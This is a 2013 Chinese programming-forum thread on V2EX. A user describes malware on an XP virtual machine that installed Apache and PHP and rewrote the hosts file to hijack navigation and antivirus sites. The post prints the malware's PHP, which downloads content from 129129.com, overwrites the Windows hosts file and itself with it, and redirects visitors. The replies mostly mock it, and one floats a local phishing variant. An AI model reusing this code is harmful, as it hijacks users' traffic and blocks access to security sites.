V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
jacy
V2EX  ›  程序员

中毒了,我想吐槽一下,这个病毒是谁写的

  •  
  •   jacy · 2013-11-25 21:42:32 +08:00 · 11838 次点击
    这是一个创建于 4016 天前的主题,其中的信息可能已经有所发展或是发生改变。
    本人有个xp虚拟机,上面没装杀毒软件。有一次不知安装了什么,桌面上总是会自动创建某网站的快捷方式,然后看进程把几个exe删掉就好了。
    看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。

    贴index.php给大家看看(还自带注释的-_-||):
    <?php
    include_once "config.php";
    $name1 = "www.2345.com,2345.com";
    $name2 = "www.tao123.com,tao123.com";
    //$name3 = "www.hao123.com,hao123.com";

    //获取最新php

    $index = file_get_contents('http://www.129129.com/ht/index.txt');
    if(strpos($index, '@')!==false)
    {
    $arr = explode("@", $index);

    $index = $arr[1];
    $hosts = $arr[0];
    $index = get_rep($index);
    if(!empty($index)){
    if(file_put_contents("index.php", $index)==0){}
    }

    //获取最新hosts
    if(!empty($hosts)){
    if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
    }
    }
    //域名跳转个性化

    $serverName = $_SERVER['SERVER_NAME'];
    switch ($serverName) {
    case strpos($name1,$serverName)!==false:
    header("Location:http://www.129129.com/?1");exit;
    break;
    case strpos($name2,$serverName)!==false:
    header("Location:http://www.129129.com/?2");exit;
    break;
    case strpos($name3,$serverName)!==false:
    header("Location:http://www.129129.com/?3");exit;
    break;
    default:
    header("Location:http://www.129129.com/?4");exit;
    break;
    }

    ?>
    <meta http-equiv="refresh" content="0;url=http://www.129129.com/?301">

    config.php:
    <?php
    function get_rep($index)
    {
    return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
    }
    ?>
    46 条回复    1970-01-01 08:00:00 +08:00
    shierji
        1
    shierji  
       2013-11-25 21:46:58 +08:00
    原版才是正道啊……- -
    imsuwj
        2
    imsuwj  
       2013-11-25 22:11:35 +08:00
    很有想法。。。
    soulgain
        3
    soulgain  
       2013-11-25 22:20:40 +08:00
    这恶意的方式好搞笑啊~~
    AstroProfundis
        4
    AstroProfundis  
       2013-11-25 22:22:59 +08:00   ❤️ 1
    莫名喜感是为啥...
    zts1993
        5
    zts1993  
       2013-11-25 22:23:23 +08:00   ❤️ 2
    php程序员也可以写病毒啦,。。。。233333
    likuku
        6
    likuku  
       2013-11-25 22:28:55 +08:00
    虚拟机装好XP就立即安装MS官方的 security-essentials
    pirex
        7
    pirex  
       2013-11-25 22:30:50 +08:00   ❤️ 1
    好喜感。。
    lizheming
        8
    lizheming  
       2013-11-25 22:48:57 +08:00 via iPad
    我想说这样能被杀毒软件检测出来么。感觉都是正常步骤额
    Mutoo
        9
    Mutoo  
       2013-11-25 22:51:42 +08:00
    Domain Name : 129129.com

    Registrar: eName Technology Co.,Ltd.

    注册人联系 Information :
    LinYu
    Xiamen eName Technology Co.,Ltd.

    CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
    tel: 86 4000400044
    fax: 86 4000044400 5

    管理人联系 Information :
    LinYu
    Xiamen eName Technology Co.,Ltd.

    CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
    tel: 86 4000400044
    fax: 86 4000044400 5

    技术联系 Information :
    LinYu
    Xiamen eName Technology Co.,Ltd.

    CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
    tel: 86 4000400044
    fax: 86 4000044400 5

    财务联系 Information :
    LinYu
    Xiamen eName Technology Co.,Ltd.

    CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000
    tel: 86 4000400044
    fax: 86 4000044400 5

    状态:
    clientDeleteProhibited
    clientTransferProhibited


    DNS服务器 :
    F1G1NS1.DNSPOD.NET
    F1G1NS2.DNSPOD.NET


    创建时间 : 2010-10-27 18:50:02
    过期时间 : 2015-10-27 18:50:02

    =====

    居然是厦门的,丢人啊。
    kutata
        10
    kutata  
       2013-11-25 23:06:17 +08:00
    因为这样写杀毒软件不杀?-_-||
    DearMark
        11
    DearMark  
       2013-11-25 23:14:30 +08:00
    觉历,这个Apache装得秒,你还可以用一下。
    sophy
        12
    sophy  
       2013-11-25 23:26:07 +08:00
    确实啊,这样应该能躲过杀毒软件
    yfdyh000
        13
    yfdyh000  
       2013-11-25 23:34:44 +08:00
    @Mutoo 那不是域名商信息吗?
    plprapper
        14
    plprapper  
       2013-11-25 23:49:57 +08:00   ❤️ 1
    想当年 学校里上 lamp课程的时候 很多同学搞不定环境安装 各种报错。。。。
    哈哈 把这个东西发给学校老师把, 一键搞定。
    raincious
        15
    raincious  
       2013-11-25 23:58:33 +08:00 via Android
    好奇为什么不用nodejs写,又轻又小,再不济用php自己的服务器啊。

    要是再把mysql装上就搞了。
    yfdyh000
        16
    yfdyh000  
       2013-11-26 00:01:21 +08:00
    网页直接嵌入了 http://www.qq.net/129129_2.html ,页面修改自114la,很多都没改。
    粤ICP备05021225号-5。这是雨林木风的?……
    lhx2008
        17
    lhx2008  
       2013-11-26 06:59:07 +08:00
    跳转的方法蛋疼,一眼就知道被劫持了把,而且改hosts不能过杀软
    jianghu52
        18
    jianghu52  
       2013-11-26 07:57:29 +08:00
    话说命名还挺规范的啊。
    qonco
        19
    qonco  
       2013-11-26 09:14:25 +08:00
    //域名跳转个性化

    噗~
    wheatcuican
        20
    wheatcuican  
       2013-11-26 09:53:51 +08:00   ❤️ 1
    居然装apache,噗~
    wheatcuican
        21
    wheatcuican  
       2013-11-26 09:54:30 +08:00
    还自带注释,噗~
    xiaket
        22
    xiaket  
       2013-11-26 10:15:30 +08:00
    真有创意...
    sun019
        23
    sun019  
       2013-11-26 10:19:58 +08:00   ❤️ 1
    创意啊 不错 收藏了
    meta
        24
    meta  
       2013-11-26 10:21:22 +08:00
    这得多大一个体积的病毒啊。
    wingoo
        25
    wingoo  
       2013-11-26 10:48:10 +08:00
    关键是杀毒软件不杀..
    justfindu
        26
    justfindu  
       2013-11-26 11:14:47 +08:00
    还写注释~ 这习惯真好啊
    tuzi
        27
    tuzi  
       2013-11-26 11:23:14 +08:00
    这思路绝了,可惜没用在正路上!
    refresh
        29
    refresh  
       2013-11-26 12:23:09 +08:00
    难道杀毒软件不管个性hosts么,hosts需要权限吧
    summic
        30
    summic  
       2013-11-26 12:30:11 +08:00
    思路牛逼,估计那家伙很快就会用几十k的webserver换掉apache和php
    kfll
        31
    kfll  
       2013-11-26 12:40:53 +08:00 via iPhone
    还好只是跳转……要是直接在本地搭钓鱼站……还能随时更新……简直……
    josephok
        32
    josephok  
       2013-11-26 14:22:57 +08:00
    XD
    lucker6666
        33
    lucker6666  
       2013-11-26 14:29:34 +08:00
    @kfll 这思路 nb了
    erse
        34
    erse  
       2013-11-26 14:38:30 +08:00
    牛逼的思路,这可以算是流量么?
    kran
        35
    kran  
       2013-11-26 14:57:33 +08:00
    能把apache装上那简直是不容易了,手动安装我都嫌烦。。
    zjgsamuel
        36
    zjgsamuel  
       2013-11-26 16:21:54 +08:00
    这肉鸡使的 学习了!!
    tywtyw2002
        37
    tywtyw2002  
       2013-11-26 17:37:47 +08:00
    我还见过一个木马呢,把某个webhosting的母鸡给入侵了。
    自己编译了一个新的nginx,在这个nginx里面加入了功能,随机把网页302倒色情广告联盟,然后加上cookie,这样用户第二次访问就不会跳转了。。。。。
    然后把老的nginx文件给替换成一个sh脚本。。。。
    aivier
        38
    aivier  
       2013-11-26 17:42:01 +08:00
    好吧,无敌了,竟然还可以这样写恶意软件。。。!
    chengzi
        39
    chengzi  
       2013-11-26 21:06:17 +08:00   ❤️ 1
    注释好习惯
    codegear
        40
    codegear  
       2013-11-26 23:23:37 +08:00 via Android
    莫名的喜感啊!
    laobubu
        41
    laobubu  
       2013-11-26 23:58:03 +08:00 via Android
    求病毒,一键部署apache啊!!
    iqincai
        42
    iqincai  
       2013-11-27 10:01:41 +08:00 via Android
    好有喜感啊-.-
    tioover
        43
    tioover  
       2013-11-27 19:41:47 +08:00
    23333
    Quaintjade
        44
    Quaintjade  
       2013-11-27 20:37:31 +08:00
    以前有笑话说用C#写个病毒还要先帮用户下载安装合适版本的.NET Framework,没想到还真有写个php病毒先帮用户安装apache和php的……
    chens
        45
    chens  
       2013-11-28 09:38:05 +08:00
    思路挺牛x
    yanwen
        46
    yanwen  
       2013-12-16 12:06:58 +08:00
    @tywtyw2002 好牛逼。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2383 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 16:08 · PVG 00:08 · LAX 08:08 · JFK 11:08
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.